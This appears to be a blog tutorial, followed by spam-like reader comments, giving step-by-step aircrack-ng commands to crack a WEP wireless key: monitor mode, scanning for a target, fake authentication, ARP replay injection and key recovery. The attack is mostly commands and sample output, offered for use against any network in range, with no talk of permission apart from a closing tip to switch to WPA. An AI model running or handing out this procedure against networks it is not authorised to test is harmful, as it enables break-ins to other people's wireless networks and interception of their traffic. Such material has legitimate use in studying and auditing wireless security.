This tutorial will walk you through a step by step procedure to crack WEP secured wireless network. It is really easy to crack WEP. There are not lots of WEP secured router found nowadays. Everybody have moved to WPA/WPA2-PSK. So after reading this post i highly advice you to change your Wireless security setting to WPA or WPA2-PSK.
What You’ll need
The process is quite simple and anyone can do it. But you have to be patient for a while, like for an hour or so.
- BackTrack OS. Backtrack is a bootable Linux distribution with lots of pen-testing tools and is almost needed for all my tutorials. So, if you have not installed it please read this article on how ton install it.
- A compatible wireless network adapter. A wireless network adapter which receives a good signal from the target access point and is capable of injecting packets. If you are live booting BackTrack then the internal adapter will work but then also I recommend an external wireless adapter which will be more powerful and can receive more signal from the access point.
Let’s get started
Step 1: Boot into Backtrack.
You can use any method to boot into backtrack; like from live cd, VMware, dual boot, etc. So, just boot it first into the GUI mode and open up a new console(command line) which is in the taskbar.
Step 2: Execute the below command to see the list of your network interfaces.
airmon-ng
My wireless network card interface is wlan0 and probably yours may be the same. Please note the interface name.
Note: To connect your wireless network card into WMware. Firstly, connect it to the USB and then you will see a small USB icon like in the figure in the top right of VMware. Then, right click on it and click connect. At last, USB sign will turn into green colour and start to glow.
Step 3: Enable the monitor mode.
To enable the monitor mode please run the following commands and please note that (interface) means your wireless network interface name like wlan0.
airmon-ng start (interface)
In my case,
airmon-ng start wlan0
Step 4: Let’s start airodump
Now we have successfully started the card in monitor mode. So, to search around for the wireless networks execute the following command.
airodump-ng mon0
Here you will see a lot of wireless networks if they are in range. Please keep note of the BSSID and channel of the ESSID (wireless network) you want to crack. Please note that the less the number is in the PWR column the close you are to that network. When you find it hit CTrl+C to stop it scanning and enter the following:
airodump-ng --bssid (AP BSSID address) -c (chaneel no) -w (file name you want to save with) (monitor interface)
And, in my case it will be
airodump-ng --bssid 54:E6:FC:F0:AC:FC -c 1 -w Ehackwifi mon0
Then the screen will look like this:
NOTE: I thinks this attack will be more appropriate if you see a STATION in the next screen and also somewhat increase of the data in DATA column. But it is not compulsory, but if you could not crack the key simply then i will recommend you to wait for a client to be connected.
Step 5: Packet Injection test
This step is optional but it is done to check the range between your wireless card and the AP and either it can inject packet or not. To do so enter the following:
aireplay-ng -9 -e (essid) -a (AP BSSID address) ath0
If everything is right then it should prompt you:
09:23:35 Waiting for beacon frame (BSSID: 11:22:33:44:55:66) on channel 1 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 11:22:33:44:55:66 - channel: 1 - 'essid' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
Please see the last line. It should mostly say 100% or nearer to it. But, if it is low then either you are too far away from the AP or too close to it. And if it is zero then injection will not work.
Step 6: Let’s do a fake authentication to associate with AP
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why injection fails.
So, enter the command in a new console to do a fake authentication to get associated.
aireplay-ng -1 0 -e (essid) -a (AP BSSID address) mon0
Now the successful attempt will look like the following picture.
And a failed authentication looks like:
8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association Request
So, look at the “Got a deauthentication packet” and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.
Step 7: ARP request replay mode
The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.
Again, open another console and type the following:
aireplay-ng -3 -b (AP BSSID address) mon0
Now, it will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. But if it stucks for a long time trying to inject then you may try to connect another wireless card(Laptop’s Internal) to it by using any password or sending DeAuthentication packets to the AP to make it work. I do not know why but it worked for me few times. And the screen should look like below after it start to inject:
You will notice a rapid increase in the data column of airodump-ng screen. The more you got the good it is. 50,000 would be enough but you can try to crack it at 20,000 also which we are going to do on next step.
Note: But if you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.
Final Step: Aircrack-ng to obtain WEP key
Now, afters you have got a lot of data you can start the cracking process and you can continue running the ARP request console so that we can get more data if there are not enough data. Please enter the following code to execute the cracking process.
aircrack-ng -b (bssid) (file name-01.cap)
Here, file name is the one which you entered with “-w” in airodump-ng command in step 4 and add “-01.cap” which is added default by BackTrack. You can also find the file by tying ls in a new console.
If everything worked fine then it will try to crack the password as shown in the figure and after few moments it will show you the KEY.
Hope you like this tutorial..!!! If you have any problem then please leave a comment.
I favor the valuable information anyone provide on your posts. I’m going to save your blog post and also test out once more listed here often. I am just slightly positive Let me master lots of innovative goods listed here! Enjoy for the!
Fantastic site. Lots of helpful information here. I am sending it to several friends ans additionally sharing in delicious. And naturally, thank you in your effort!
Hello my children fellow member! I need to declare that this post rocks !, wonderful prepared and include around very important infos. I’d like to glimpse additional posts such as this .
Very very good day, this is the definitely superb website, I’ve plummeting in adore studying many from the posts and threads contained after the location, sustain the awesome perform as well as hope to learn a lot more exciting articles from time to come.